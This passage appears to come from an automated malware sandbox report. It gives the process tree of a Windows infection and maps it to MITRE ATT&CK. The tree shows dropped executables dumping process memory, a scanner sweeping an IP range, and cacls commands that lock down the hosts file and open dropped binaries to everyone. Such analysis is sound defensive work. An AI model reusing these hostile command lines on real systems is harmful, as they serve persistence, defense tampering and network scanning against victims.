    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2792 C:\Windows\TEMP\lubbeisit\2792.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:3748
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2840 C:\Windows\TEMP\lubbeisit\2840.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:2900
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3148 C:\Windows\TEMP\lubbeisit\3148.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:3104
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3852 C:\Windows\TEMP\lubbeisit\3852.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:4044
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3944 C:\Windows\TEMP\lubbeisit\3944.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:4728
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 4008 C:\Windows\TEMP\lubbeisit\4008.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:3008
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 408 C:\Windows\TEMP\lubbeisit\408.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:1228
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 4552 C:\Windows\TEMP\lubbeisit\4552.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:4972
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2340 C:\Windows\TEMP\lubbeisit\2340.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:4692
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 832 C:\Windows\TEMP\lubbeisit\832.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:4584
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3436 C:\Windows\TEMP\lubbeisit\3436.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:2904
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2640 C:\Windows\TEMP\lubbeisit\2640.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:2100
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 5052 C:\Windows\TEMP\lubbeisit\5052.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe  PID:1108
    cmd: cmd.exe /c C:\Windows\lubbeisit\abkgigiey\scan.bat
    C:\Windows\lubbeisit\abkgigiey\nstjgbafp.exe  PID:3556
      cmd: nstjgbafp.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
      - Executes dropped EXE
      - Drops file in Windows directory
  C:\Windows\SysWOW64\cmd.exe  PID:1644
    cmd: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    C:\Windows\SysWOW64\cmd.exe  PID:4344
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe  PID:3592
      cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    C:\Windows\SysWOW64\cmd.exe  PID:3708
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe  PID:1028
      cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    C:\Windows\SysWOW64\cmd.exe  PID:4456
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe  PID:3716
      cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

C:\Windows\SysWOW64\nslfoo.exe  PID:1360
  cmd: C:\Windows\SysWOW64\nslfoo.exe
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE  PID:4256
  cmd: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F
  C:\Windows\system32\cmd.exe  PID:2460
    cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  C:\Windows\system32\cacls.exe  PID:3320
    cmd: cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F

C:\Windows\system32\cmd.EXE  PID:2188
  cmd: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F
  C:\Windows\system32\cmd.exe  PID:3212
    cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  C:\Windows\system32\cacls.exe  PID:2976
    cmd: cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F

C:\Windows\system32\cmd.EXE  PID:4904
  cmd: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\euikgtl.exe
  C:\Windows\ime\euikgtl.exe  PID:3588
    cmd: C:\Windows\ime\euikgtl.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE  PID:1276
  cmd: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F
  C:\Windows\system32\cmd.exe  PID:5324
    cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  C:\Windows\system32\cacls.exe  PID:5164
    cmd: cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F

C:\Windows\system32\cmd.EXE  PID:4744
  cmd: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\euikgtl.exe
  C:\Windows\ime\euikgtl.exe  PID:6000
    cmd: C:\Windows\ime\euikgtl.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE  PID:5392
  cmd: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F
  C:\Windows\system32\cmd.exe  PID:6072
    cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  C:\Windows\system32\cacls.exe  PID:5880
    cmd: cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (1): Disable or Modify System Firewall (1)
- Modify Registry (1)
Downloads